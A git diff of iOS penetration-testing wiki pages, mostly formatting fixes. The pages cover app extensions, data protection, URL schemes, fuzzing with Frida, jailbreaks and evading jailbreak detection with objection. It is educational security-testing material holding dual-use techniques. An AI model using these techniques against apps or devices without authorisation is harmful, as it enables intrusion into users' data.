-**Content copied form **[**https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#app-extensions**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#app-extensions)****
+**Content copied form** [**https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#app-extensions**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#app-extensions)****
 
 App extensions let apps offer custom functionality and content to users while they’re interacting with other apps or the system. Some notable ones are:
 
@@ -8,9 +8,9 @@ App extensions let apps offer custom functionality and content to users while th
 * **Share**: post to a sharing website or share content with others.
 * **Today**: also called **widgets**, they offer content or perform quick tasks in the Today view of Notification Center.
 
-For example, the user selects text in the _host app_, clicks on the "Share" button and selects one "app" or action from the list. This triggers the _app extension_ of the _containing app_. The app extension displays its view within the context of the host app and uses the items provided by the host app, the selected text in this case, to perform a specific task (post it on a social network, for example). See this picture from the [Apple App Extension Programming Guide](https://developer.apple.com/library/archive/documentation/General/Conceptual/ExtensibilityPG/ExtensionOverview.html#//apple_ref/doc/uid/TP40014214-CH2-SW13) which pretty good summarizes this:
+For example, the user selects text in the _host app_, clicks on the "Share" button and selects one "app" or action from the list. This triggers the _app extension_ of the _containing app_. The app extension displays its view within the context of the host app and uses the items provided by the host app, the selected text in this case, to perform a specific task (post it on a social network, for example). See this picture from the [Apple App Extension Programming Guide](https://developer.apple.com/library/archive/documentation/General/Conceptual/ExtensibilityPG/ExtensionOverview.html#//apple\_ref/doc/uid/TP40014214-CH2-SW13) which pretty good summarizes this:
 
-![](https://gblobscdn.gitbook.com/assets%2F-LH00RC4WVf3-6Ou4e0l%2F-Lf1APQHyCHdAvoJSvc\_%2F-Lf1AQx9khfTwUwYuMti%2Fapp_extensions_communication.png?alt=media)
+![](https://gblobscdn.gitbook.com/assets%2F-LH00RC4WVf3-6Ou4e0l%2F-Lf1APQHyCHdAvoJSvc\_%2F-Lf1AQx9khfTwUwYuMti%2Fapp\_extensions\_communication.png?alt=media)
 
 ### **Security Considerations**
 
@@ -88,11 +88,11 @@ Inspect the app extension's `Info.plist` file and search for `NSExtensionActivat
     </dict>
 ```
 
-Only the data types present here and not having `0` as `MaxCount` will be supported. However, more complex filtering is possible by using a so-called predicate string that will evaluate the UTIs given. Please refer to the [Apple App Extension Programming Guide](https://developer.apple.com/library/archive/documentation/General/Conceptual/ExtensibilityPG/ExtensionScenarios.html#//apple_ref/doc/uid/TP40014214-CH21-SW8) for more detailed information about this.
+Only the data types present here and not having `0` as `MaxCount` will be supported. However, more complex filtering is possible by using a so-called predicate string that will evaluate the UTIs given. Please refer to the [Apple App Extension Programming Guide](https://developer.apple.com/library/archive/documentation/General/Conceptual/ExtensibilityPG/ExtensionScenarios.html#//apple\_ref/doc/uid/TP40014214-CH21-SW8) for more detailed information about this.
 
 **Checking Data Sharing with the Containing App**
 
-Remember that app extensions and their containing apps do not have direct access to each other’s containers. However, data sharing can be enabled. This is done via ["App Groups"](https://developer.apple.com/library/archive/documentation/Miscellaneous/Reference/EntitlementKeyReference/Chapters/EnablingAppSandbox.html#//apple_ref/doc/uid/TP40011195-CH4-SW19) and the [`NSUserDefaults`](https://developer.apple.com/documentation/foundation/nsuserdefaults) API. See this figure from [Apple App Extension Programming Guide](https://developer.apple.com/library/archive/documentation/General/Conceptual/ExtensibilityPG/ExtensionScenarios.html#//apple_ref/doc/uid/TP40014214-CH21-SW11):
+Remember that app extensions and their containing apps do not have direct access to each other’s containers. However, data sharing can be enabled. This is done via ["App Groups"](https://developer.apple.com/library/archive/documentation/Miscellaneous/Reference/EntitlementKeyReference/Chapters/EnablingAppSandbox.html#//apple\_ref/doc/uid/TP40011195-CH4-SW19) and the [`NSUserDefaults`](https://developer.apple.com/documentation/foundation/nsuserdefaults) API. See this figure from [Apple App Extension Programming Guide](https://developer.apple.com/library/archive/documentation/General/Conceptual/ExtensibilityPG/ExtensionScenarios.html#//apple\_ref/doc/uid/TP40014214-CH21-SW11):
 
 ![](broken-reference)
 
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-basics.md b/mobile-apps-pentesting/ios-pentesting/ios-basics.md
index 1d8dd41c..6b4edf33 100644
--- a/mobile-apps-pentesting/ios-pentesting/ios-basics.md
+++ b/mobile-apps-pentesting/ios-pentesting/ios-basics.md
@@ -12,15 +12,15 @@ Once installed, applications have limited read access to some system areas and f
 
 ## Data Protection
 
-App developers can leverage the iOS _Data Protection_ APIs to implement **fine-grained access control **for user data stored in flash memory. The APIs are built on top of the **Secure Enclave Processor** (SEP). The SEP is a coprocessor that provides **cryptographic operations for data protection and key management**. A device-specific hardware key-the **device UID **(Unique ID)-is** embedded in the secure enclave**, ensuring the integrity of data protection even when the operating system kernel is compromised.
+App developers can leverage the iOS _Data Protection_ APIs to implement **fine-grained access control** for user data stored in flash memory. The APIs are built on top of the **Secure Enclave Processor** (SEP). The SEP is a coprocessor that provides **cryptographic operations for data protection and key management**. A device-specific hardware key-the **device UID** (Unique ID)-is **embedded in the secure enclave**, ensuring the integrity of data protection even when the operating system kernel is compromised.
 
-When a **file is created** on the disk, a new **256-bit AES key is generated **with the help of secure enclave's hardware based random number generator. The **content of the file is then encrypted with the generated key**. And then, this **key is saved encrypted with a class key** along with **the class ID, **with** both data encrypted by the system's key, **inside the **metadata** of the file.
+When a **file is created** on the disk, a new **256-bit AES key is generated** with the help of secure enclave's hardware based random number generator. The **content of the file is then encrypted with the generated key**. And then, this **key is saved encrypted with a class key** along with **the class ID,** with **both data encrypted by the system's key,** inside the **metadata** of the file.
 
 ![](<../../.gitbook/assets/image (473).png>)
 
 For decrypting the file, the **metadata is decrypted using the system's key**. Then u**sing the class ID** the **class key is retrieved** **to decrypt the per-file key and decrypt the file.**
 
-Files can be assigned to one of **four** **different** **protection** classes, which are explained in more detail in the [iOS Security Guide](https://www.apple.com/business/docs/iOS_Security_Guide.pdf):
+Files can be assigned to one of **four** **different** **protection** classes, which are explained in more detail in the [iOS Security Guide](https://www.apple.com/business/docs/iOS\_Security\_Guide.pdf):
 
 * **Complete Protection (NSFileProtectionComplete)**: A key derived from the user passcode and the device UID protects this class key. The derived key is wiped from memory shortly after the device is locked, making the data inaccessible until the user unlocks the device.
 * **Protected Unless Open (NSFileProtectionCompleteUnlessOpen)**: This protection class is similar to Complete Protection, but, if the file is opened when unlocked, the app can continue to access the file even if the user locks the device. This protection class is used when, for example, a mail attachment is downloading in the background.
@@ -49,7 +49,7 @@ The [Keychain API](https://developer.apple.com/library/content/documentation/Sec
 
 The only ways to try to BF this password is dumping the encrypted key and BF the passcode + salt (the **pbkdf2** function uses **at least 10000 iteration**s). Or trying to **BF inside the device** to avoids BFing the salt, however, secure enclave ensures there is at least a **5s delay between 2 failed password attempts**.
 
-You can configure **data protection for Keychain items** by setting the `kSecAttrAccessible` key in the call to `SecItemAdd` or `SecItemUpdate`.The following configurable [accessibility values for kSecAttrAccessible](https://developer.apple.com/documentation/security/keychain_services/keychain_items/item_attribute_keys_and_values#1679100) are the Keychain Data Protection classes:
+You can configure **data protection for Keychain items** by setting the `kSecAttrAccessible` key in the call to `SecItemAdd` or `SecItemUpdate`.The following configurable [accessibility values for kSecAttrAccessible](https://developer.apple.com/documentation/security/keychain\_services/keychain\_items/item\_attribute\_keys\_and\_values#1679100) are the Keychain Data Protection classes:
 
 * **`kSecAttrAccessibleAlways`**: The data in the Keychain item can **always be accessed**, regardless of whether the device is locked.
 * **`kSecAttrAccessibleAlwaysThisDeviceOnly`**: The data in the Keychain item can **always** **be** **accessed**, regardless of whether the device is locked. The data **won't be included in an iCloud** or local backup.
@@ -57,7 +57,7 @@ You can configure **data protection for Keychain items** by setting the `kSecAtt
 * **`kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly`**: The data in the Keychain item can't be accessed after a restart until the **device has been unlocked once** by the user. Items with this attribute do **not migrate to a new device**. Thus, after restoring from a backup of a different device, these items will not be present.
 * **`kSecAttrAccessibleWhenUnlocked`**: The data in the Keychain item can be accessed **only while the device is unlocked** by the user.
 * **`kSecAttrAccessibleWhenUnlockedThisDeviceOnly`**: The data in the Keychain item can be accessed **only while the device is unlocked** by the user. The data **won't be included in an iCloud or local backup**.
-* **`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly`**: The data in the Keychain can be accessed **only when the device is unlocked**. This protection class is **only available if a passcode is set **on the device. The data w**on't be included in an iCloud or local backup**.
+* **`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly`**: The data in the Keychain can be accessed **only when the device is unlocked**. This protection class is **only available if a passcode is set** on the device. The data w**on't be included in an iCloud or local backup**.
 
 **`AccessControlFlags`** define the mechanisms with which users can authenticate the key (`SecAccessControlCreateFlags`):
 
@@ -106,9 +106,9 @@ if userDefaults.bool(forKey: "hasRunBefore") == false {
 
 Some [**capabilities/permissions**](https://help.apple.com/developer-account/#/dev21218dfd6) can be configured by the app's developers (e.g. Data Protection or Keychain Sharing) and will directly take effect after the installation. However, for others, **the user will be explicitly asked the first time the app attempts to access a protected resource**.
 
-[_Purpose strings_](https://developer.apple.com/documentation/uikit/core_app/protecting_the_user_s_privacy/accessing_protected_resources?language=objc#3037322) or _usage description strings_ are custom texts that are offered to users in the system's permission request alert when requesting permission to access protected data or resources.
+[_Purpose strings_](https://developer.apple.com/documentation/uikit/core\_app/protecting\_the\_user\_s\_privacy/accessing\_protected\_resources?language=objc#3037322) or _usage description strings_ are custom texts that are offered to users in the system's permission request alert when requesting permission to access protected data or resources.
 
-![](https://gblobscdn.gitbook.com/assets%2F-LH00RC4WVf3-6Ou4e0l%2F-Lf1APQHyCHdAvoJSvc\_%2F-Lf1AQw8W2q7BB5-il7r%2Fpermission_request_alert.png?alt=media)
+![](https://gblobscdn.gitbook.com/assets%2F-LH00RC4WVf3-6Ou4e0l%2F-Lf1APQHyCHdAvoJSvc\_%2F-Lf1AQw8W2q7BB5-il7r%2Fpermission\_request\_alert.png?alt=media)
 
 If having the original source code, you can verify the permissions included in the `Info.plist` file:
 
@@ -133,7 +133,7 @@ If only having the IPA:
 
 ### Device Capabilities
 
-Device capabilities are used by the App Store to ensure that only compatible devices are listed and therefore are allowed to download the app. They are specified in the `Info.plist` file of the app under the [`UIRequiredDeviceCapabilities`](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/iPhoneOSKeys.html#//apple_ref/doc/plist/info/UIRequiredDeviceCapabilities) key.
+Device capabilities are used by the App Store to ensure that only compatible devices are listed and therefore are allowed to download the app. They are specified in the `Info.plist` file of the app under the [`UIRequiredDeviceCapabilities`](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/iPhoneOSKeys.html#//apple\_ref/doc/plist/info/UIRequiredDeviceCapabilities) key.
 
 ```markup
 <key>UIRequiredDeviceCapabilities</key>
@@ -148,7 +148,7 @@ For example, an app might be completely dependent on NFC to work (e.g. a ["NFC T
 
 ### Entitlements
 
-> Entitlements are key value pairs that are signed in to an app and allow authentication beyond runtime factors, like UNIX user ID. Since entitlements are digitally signed, they can’t be changed. Entitlements are used extensively by system apps and daemons to** perform specific privileged operations that would otherwise require the process to run as root**. This greatly reduces the potential for privilege escalation by a compromised system app or daemon.
+> Entitlements are key value pairs that are signed in to an app and allow authentication beyond runtime factors, like UNIX user ID. Since entitlements are digitally signed, they can’t be changed. Entitlements are used extensively by system apps and daemons to **perform specific privileged operations that would otherwise require the process to run as root**. This greatly reduces the potential for privilege escalation by a compromised system app or daemon.
 
 For example, if you want to set the "Default Data Protection" capability, you would need to go to the **Capabilities** tab in Xcode and enable **Data Protection**. This is directly written by Xcode to the `<appname>.entitlements` file as the `com.apple.developer.default-data-protection` entitlement with default value `NSFileProtectionComplete`. In the IPA we might find this in the `embedded.mobileprovision` as:
 
@@ -167,15 +167,15 @@ For other capabilities such as HealthKit, the user has to be asked for permissio
 
 **Objecttive-C** has a **dynamic runtime**, so when an Objective-C program is executed in iOS, it calls libraries whose **address are resolved at runtime** by comparing the name of the function sent in the message against a list of all the function names available.
 
-At the beginning, only apps created by Apple run the iPhones, so they had **access to everything** as they were **trusted**. However, when Apple **allowed** **third party applications, **Apple just removed the headers files of the powerful functions to "hide" them to developers. However, developers found that "safe" functions needed a few of these undocumented functions and just creating a **custom header file with the names of the undocumented functions, it was possible to invoke this powerful hidden functions. **Actually, Apple, before allowing an app to be published, check if the app calls any of these prohibited functions.
+At the beginning, only apps created by Apple run the iPhones, so they had **access to everything** as they were **trusted**. However, when Apple **allowed** **third party applications,** Apple just removed the headers files of the powerful functions to "hide" them to developers. However, developers found that "safe" functions needed a few of these undocumented functions and just creating a **custom header file with the names of the undocumented functions, it was possible to invoke this powerful hidden functions.** Actually, Apple, before allowing an app to be published, check if the app calls any of these prohibited functions.
 
 Then, Swift appeared. As **Swift is statically bound** (it doesn't resolve the address of the functions in runtime like Objective-C), it can be checked more easily the calls a Swift program is going to make via static code analysis.
 
 ## Device Management
 
-From iOS version 6, there is **built-in support for device management **capability with fine grain controls that allows an organisation to control the corporate apple devices.\
+From iOS version 6, there is **built-in support for device management** capability with fine grain controls that allows an organisation to control the corporate apple devices.\
 The enrolment can be **initiated by the user installing an agent** in order to access the corporate apps. In this case the device usually belongs to the user.\
-Or the **company can indicate the serial numbers **of the bought devices or the purchase order ID and specify the MDM profile to install on those devices. Note that Apple **doesn't allow to enrol a particular device this way twice**. Once the first profile is deleted the user needs to give consent to install another one.
+Or the **company can indicate the serial numbers** of the bought devices or the purchase order ID and specify the MDM profile to install on those devices. Note that Apple **doesn't allow to enrol a particular device this way twice**. Once the first profile is deleted the user needs to give consent to install another one.
 
 The user can see the installed policies in _**Settings**_ --> _**General**_ --> _**Profile and Device Management**_
 
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md b/mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md
index 5d7ac344..230e9842 100644
--- a/mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md
+++ b/mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md
@@ -1,8 +1,8 @@
 # iOS Custom URI Handlers / Deeplinks / Custom Schemes
 
-Custom URL schemes [allow apps to communicate via a custom protocol](https://developer.apple.com/library/content/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW1). An app must declare support for the schemes and handle incoming URLs that use those schemes.
+Custom URL schemes [allow apps to communicate via a custom protocol](https://developer.apple.com/library/content/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple\_ref/doc/uid/TP40007072-CH6-SW1). An app must declare support for the schemes and handle incoming URLs that use those schemes.
 
-> URL schemes offer a potential attack vector into your app, so make sure to** validate all URL parameters** and **discard any malformed URLs**. In addition, limit the available **actions** to those that d**o not risk the user’s data**.
+> URL schemes offer a potential attack vector into your app, so make sure to **validate all URL parameters** and **discard any malformed URLs**. In addition, limit the available **actions** to those that d**o not risk the user’s data**.
 
 For example, the URI: `myapp://hostname?data=123876123` will **invoke** the **application** mydata (the one that has **register** the scheme `mydata`) to the **action** related to the **hostname** `hostname` sending the **parameter** `data` with value `123876123`
 
@@ -24,7 +24,7 @@ You can find the **schemes registered by an application** in the app's **`Info.p
 </array>
 ```
 
-However, note that **malicious applications can re-register URIs** already registered by applications. So, if you are sending **sensitive information via URIs** (myapp://hostname?password=123456) a **malicious** application can **intercept **the URI with the **sensitive** **information**.
+However, note that **malicious applications can re-register URIs** already registered by applications. So, if you are sending **sensitive information via URIs** (myapp://hostname?password=123456) a **malicious** application can **intercept** the URI with the **sensitive** **information**.
 
 Also, the input of these URIs **should be checked and sanitised,** as it can be coming from **malicious** **origins** trying to exploit SQLInjections, XSS, CSRF, Path Traversals, or other possible vulnerabilities.
 
@@ -77,7 +77,7 @@ func application(_ application: UIApplication, handleOpen url: URL) -> Bool {
 
 ### Testing URL Requests to Other Apps
 
-The method [`openURL:options:completionHandler:`](https://developer.apple.com/documentation/uikit/uiapplication/1648685-openurl?language=objc) and the [deprecated `openURL:` method of `UIApplication`](https://developer.apple.com/documentation/uikit/uiapplication/1622961-openurl?language=objc) are responsible for **opening URLs **(i.e. to send requests / make queries to other apps) that may be local to the current app or it may be one that must be provided by a different app. If you have the original source code you can search directly for usages of those methods.
+The method [`openURL:options:completionHandler:`](https://developer.apple.com/documentation/uikit/uiapplication/1648685-openurl?language=objc) and the [deprecated `openURL:` method of `UIApplication`](https://developer.apple.com/documentation/uikit/uiapplication/1622961-openurl?language=objc) are responsible for **opening URLs** (i.e. to send requests / make queries to other apps) that may be local to the current app or it may be one that must be provided by a different app. If you have the original source code you can search directly for usages of those methods.
 
 Additionally, if you are interested into knowing if the app is querying specific services or apps, and if the app is well-known, you can also search for common URL schemes online and include them in your **greps (l**[**ist of iOS app schemes**](https://ios.gadgethacks.com/how-to/always-updated-list-ios-app-url-scheme-names-paths-for-shortcuts-0184033/)**)**.
 
@@ -118,7 +118,7 @@ $ rabin2 -zzq Telegram\ X.app/Telegram\ X | grep -i "openurl"
 * [**IDB**](https://github.com/facebook/idb):
   * Start IDB, connect to your device and select the target app. You can find details in the [IDB documentation](https://www.idbtool.com/documentation/setup.html).
   * Go to the **URL Handlers** section. In **URL schemes**, click **Refresh**, and on the left you'll find a list of all custom schemes defined in the app being tested. You can load these schemes by clicking **Open**, on the right side. By simply opening a blank URI scheme (e.g., opening `myURLscheme://`), you can discover hidden functionality (e.g., a debug window) and bypass local authentication.
-*   **Frida**: 
+*   **Frida**:&#x20;
 
     If you simply want to open the URL scheme you can do it using Frida:
 
@@ -160,7 +160,7 @@ The [FuzzDB](https://github.com/fuzzdb-project/fuzzdb) project offers fuzzing di
 
 ### **Fuzzing Using Frida**
 
-Doing this with Frida is pretty easy, you can refer to this [blog post](https://grepharder.github.io/blog/0x03\_learning_about_universal_links_and_fuzzing_url_schemes_on_ios_with_frida.html) to see an example that fuzzes the iGoat-Swift app (working on iOS 11.1.2).
+Doing this with Frida is pretty easy, you can refer to this [blog post](https://grepharder.github.io/blog/0x03\_learning\_about\_universal\_links\_and\_fuzzing\_url\_schemes\_on\_ios\_with\_frida.html) to see an example that fuzzes the iGoat-Swift app (working on iOS 11.1.2).
 
 Before running the fuzzer we need the URL schemes as inputs. From the static analysis we know that the iGoat-Swift app supports the following URL scheme and parameters: `iGoat://?contactNumber={0}&message={0}`.
 
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-serialisation-and-encoding.md b/mobile-apps-pentesting/ios-pentesting/ios-serialisation-and-encoding.md
index b344d194..e25d1ec3 100644
--- a/mobile-apps-pentesting/ios-pentesting/ios-serialisation-and-encoding.md
+++ b/mobile-apps-pentesting/ios-pentesting/ios-serialisation-and-encoding.md
@@ -88,7 +88,7 @@ struct CustomPointStruct:Codable {
 }
 ```
 
-By adding `Codable` to the inheritance list for the `CustomPointStruct` in the example, the methods `init(from:)` and `encode(to:)` are automatically supported. Fore more details about the workings of `Codable` check [the Apple Developer Documentation](https://developer.apple.com/documentation/foundation/archives_and_serialization/encoding_and_decoding_custom_types).
+By adding `Codable` to the inheritance list for the `CustomPointStruct` in the example, the methods `init(from:)` and `encode(to:)` are automatically supported. Fore more details about the workings of `Codable` check [the Apple Developer Documentation](https://developer.apple.com/documentation/foundation/archives\_and\_serialization/encoding\_and\_decoding\_custom\_types).
 
 You can also use codable to save the data in the primary property list `NSUserDefaults`:
 
@@ -137,13 +137,13 @@ let stringData = String(data: data, encoding: .utf8)
 
 There are multiple ways to do XML encoding. Similar to JSON parsing, there are various third party libraries, such as: [Fuzi](https://github.com/cezheng/Fuzi), [Ono](https://github.com/mattt/Ono), [AEXML](https://github.com/tadija/AEXML), [RaptureXML](https://github.com/ZaBlanc/RaptureXML), [SwiftyXMLParser](https://github.com/yahoojapan/SwiftyXMLParser), [SWXMLHash](https://github.com/drmohundro/SWXMLHash)
 
-They vary in terms of speed, memory usage, object persistence and more important: differ in how they handle XML external entities. See [XXE in the Apple iOS Office viewer](https://nvd.nist.gov/vuln/detail/CVE-2015-3784) as an example. Therefore, it is key to disable external entity parsing if possible. See the [OWASP XXE prevention cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html) for more details. Next to the libraries, you can make use of Apple's [`XMLParser` class](https://developer.apple.com/documentation/foundation/xmlparser)
+They vary in terms of speed, memory usage, object persistence and more important: differ in how they handle XML external entities. See [XXE in the Apple iOS Office viewer](https://nvd.nist.gov/vuln/detail/CVE-2015-3784) as an example. Therefore, it is key to disable external entity parsing if possible. See the [OWASP XXE prevention cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/XML\_External\_Entity\_Prevention\_Cheat\_Sheet.html) for more details. Next to the libraries, you can make use of Apple's [`XMLParser` class](https://developer.apple.com/documentation/foundation/xmlparser)
 
 When not using third party libraries, but Apple's `XMLParser`, be sure to let `shouldResolveExternalEntities` return `false`.
 
 {% hint style="danger" %}
-All these ways of serialising/encoding data can be** used to store data in the file system**. In those scenarios, check if the stored data contains any kind of **sensitive information**.\
-Moreover, in some cases you may be able to **abuse some serialised** data (capturing it via MitM or modifying it inside the filesystem) deserializing arbitrary data and **making the application perform unexpected actions **(see [Deserialization page](../../pentesting-web/deserialization/)). In these cases, it's recommended to send/save the serialised data encrypted and signed.
+All these ways of serialising/encoding data can be **used to store data in the file system**. In those scenarios, check if the stored data contains any kind of **sensitive information**.\
+Moreover, in some cases you may be able to **abuse some serialised** data (capturing it via MitM or modifying it inside the filesystem) deserializing arbitrary data and **making the application perform unexpected actions** (see [Deserialization page](../../pentesting-web/deserialization/)). In these cases, it's recommended to send/save the serialised data encrypted and signed.
 {% endhint %}
 
 ### References
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md b/mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md
index 4cfe0516..88c76098 100644
--- a/mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md
+++ b/mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md
@@ -5,7 +5,7 @@
 A **provisioning identity** is a collection of public and private keys that are associated an Apple developer account. In order to **sign apps** you need to pay **99$/year** to register in the **Apple Developer Program** to get your provisioning identity. Without this you won't be able to run applications from the source code in a physical device. Another option to do this is to use a **jailbroken device**.
 
 Starting in Xcode 7.2 Apple has provided an option to create a **free iOS development provisioning profile** that allows to write and test your application on a real iPhone. Go to _Xcode_ --> _Preferences_ --> _Accounts_ --> _+_ (Add new Appli ID you your credentials) --> _Click on the Apple ID created_ --> _Manage Certificates_ --> _+_ (Apple Development) --> _Done_\
-__Then, in order to run your application in your iPhone you need first to **indicate the iPhone to trust the computer. **Then, you can try to **run the application in the mobile from Xcode,** but and error will appear. So go to _Settings_ --> _General_ --> _Profiles and Device Management_ --> Select the untrusted profile and click "**Trust**".
+__Then, in order to run your application in your iPhone you need first to **indicate the iPhone to trust the computer.** Then, you can try to **run the application in the mobile from Xcode,** but and error will appear. So go to _Settings_ --> _General_ --> _Profiles and Device Management_ --> Select the untrusted profile and click "**Trust**".
 
 Note that **applications signed by the same signing certificate can share resources on a secure manner, like keychain items**.
 
@@ -70,7 +70,7 @@ iOS jailbreaking is often **compared to Android rooting**, but the process is ac
 * **Rooting**: This typically involves installing the `su` binary on the system or replacing the whole system with a rooted custom ROM. Exploits aren't required to obtain root access as long as the bootloader is accessible.
 * **Flashing custom ROMs**: This allows you to replace the OS that's running on the device after you unlock the bootloader. The bootloader may require an exploit to unlock it.
 
-**On iOS devices, flashing a custom ROM is impossible **because the iOS bootloader **only allows Apple-signed images** to be booted and flashed. This is why even **official iOS images can't be installed if they aren't signed by Apple, and it makes iOS downgrades only possible for as long as the previous iOS version is still signed.**
+**On iOS devices, flashing a custom ROM is impossible** because the iOS bootloader **only allows Apple-signed images** to be booted and flashed. This is why even **official iOS images can't be installed if they aren't signed by Apple, and it makes iOS downgrades only possible for as long as the previous iOS version is still signed.**
 
 The purpose of jailbreaking is to **disable iOS protections** (Apple's code signing mechanisms in particular) so that **arbitrary unsigned code can run on the device** (e.g. custom code or downloaded from alternative app stores such as Cydia or Sileo). The word "jailbreak" is a colloquial reference to all-in-one tools that automate the disabling process.
 
@@ -78,9 +78,9 @@ The purpose of jailbreaking is to **disable iOS protections** (Apple's code sign
 
 Jailbreaking an iOS device is becoming more and more **complicated** because Apple keeps hardening the system and patching the exploited vulnerabilities. Jailbreaking has become a very time-sensitive procedure because **Apple stops signing these vulnerable versions relatively soon after releasing a fix** (unless the jailbreak benefits from hardware-based vulnerabilities, such as the [limera1n exploit](https://www.theiphonewiki.com/wiki/Limera1n) affecting the BootROM of the iPhone 4 and iPad 1). This means that **you can't downgrade to a specific iOS version once Apple stops signing the firmware**.
 
-If you have a jailbroken device that you use for security testing,** keep it **as is unless you're 100% sure that you can re-jailbreak it after upgrading to the latest iOS version.
+If you have a jailbroken device that you use for security testing, **keep it** as is unless you're 100% sure that you can re-jailbreak it after upgrading to the latest iOS version.
 
-iOS upgrades are based on a challenge-response process (generating the so-called SHSH blobs as a result). The device will allow the OS installation only if the response to the challenge is signed by Apple. This is what researchers call a "signing window", and it is the reason **you can't simply store the OTA firmware package you downloaded and load it onto the device whenever you want to**. During minor iOS upgrades, two versions may both be signed by Apple (the latest one, and the previous iOS version). This is the only situation in which you can downgrade the iOS device. You can c**heck the current signing window and download OTA firmware from the **[**IPSW Downloads website**](https://ipsw.me).
+iOS upgrades are based on a challenge-response process (generating the so-called SHSH blobs as a result). The device will allow the OS installation only if the response to the challenge is signed by Apple. This is what researchers call a "signing window", and it is the reason **you can't simply store the OTA firmware package you downloaded and load it onto the device whenever you want to**. During minor iOS upgrades, two versions may both be signed by Apple (the latest one, and the previous iOS version). This is the only situation in which you can downgrade the iOS device. You can c**heck the current signing window and download OTA firmware from the** [**IPSW Downloads website**](https://ipsw.me).
 
 {% hint style="danger" %}
 **Updating the OS removes the effect of jailbreaking.**
@@ -90,7 +90,7 @@ iOS upgrades are based on a challenge-response process (generating the so-called
 
 * **Tethered** **jailbreaks** don't persist through reboots, so re-applying jailbreaks requires the device to be connected (tethered) to a computer during every reboot. The device may not reboot at all if the computer is not connected.
 * **Semi-tethered jailbreaks** can't be re-applied unless the device is connected to a computer during reboot. The device can also boot into non-jailbroken mode on its own.
-* **Semi-untethered jailbreaks **allow the device to boot on its own, but the kernel patches (or user-land modifications) for disabling code signing aren't applied automatically. The user must re-jailbreak the device by starting an app or visiting a website (not requiring a connection to a computer, hence the term untethered).
+* **Semi-untethered jailbreaks** allow the device to boot on its own, but the kernel patches (or user-land modifications) for disabling code signing aren't applied automatically. The user must re-jailbreak the device by starting an app or visiting a website (not requiring a connection to a computer, hence the term untethered).
 * **Untethered jailbreaks** are the most popular choice for end users because they need to be applied only once, after which the device will be permanently jailbroken.
 
 ### Jailbreaking Tools
@@ -109,7 +109,7 @@ The iOS jailbreak scene evolves so rapidly that providing up-to-date instruction
 
 ### Benefits
 
-The most important side effect of Jailbreaking is that it** removes any sandboxing put in place by the OS**. Therefore, any **app on the device can read any file **on the filesystem, including other apps files, cookies and keychain.
+The most important side effect of Jailbreaking is that it **removes any sandboxing put in place by the OS**. Therefore, any **app on the device can read any file** on the filesystem, including other apps files, cookies and keychain.
 
 A jailbroken device allows users to **install unapproved apps** and leverage **more APIs**, which otherwise aren't accessible.
 
@@ -133,6 +133,6 @@ A jailbroken device allows users to **install unapproved apps** and leverage **m
 * The presence of the **OpenSSH** service
 * Calling `/bin/sh` will **return 1** instead of 0
 
-**More information about how to detect jailbreaking **[**here**](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/jailbreak-detection-methods/)**.**
+**More information about how to detect jailbreaking** [**here**](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/jailbreak-detection-methods/)**.**
 
-You can try to avoid this detections using **objection's **`ios jailbreak disable`
+You can try to avoid this detections using **objection's** `ios jailbreak disable`
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-uiactivity-sharing.md b/mobile-apps-pentesting/ios-pentesting/ios-uiactivity-sharing.md
index dd289b44..2d9ba143 100644
--- a/mobile-apps-pentesting/ios-pentesting/ios-uiactivity-sharing.md
+++ b/mobile-apps-pentesting/ios-pentesting/ios-uiactivity-sharing.md
@@ -2,7 +2,7 @@
 
 ## UIActivity Sharing
 
-Starting on iOS 6 it is possible for third-party apps to **share data (items) **via specific mechanisms [like AirDrop, for example](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW3). From a user perspective, this feature is the well-known system-wide _share activity sheet_ that appears after clicking on the "Share" button.
+Starting on iOS 6 it is possible for third-party apps to **share data (items)** via specific mechanisms [like AirDrop, for example](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple\_ref/doc/uid/TP40007072-CH6-SW3). From a user perspective, this feature is the well-known system-wide _share activity sheet_ that appears after clicking on the "Share" button.
 
 A full list of the available built-in sharing mechanisms can be found in [UIActivity.ActivityType](https://developer.apple.com/documentation/uikit/uiactivity/activitytype). If not considered appropriate for the app, the d**evelopers have the possibility to exclude some of these sharing mechanisms**.
 
@@ -33,8 +33,8 @@ $ rabin2 -zq Telegram\ X.app/Telegram\ X | grep -i activityItems
 
 When receiving items, you should check:
 
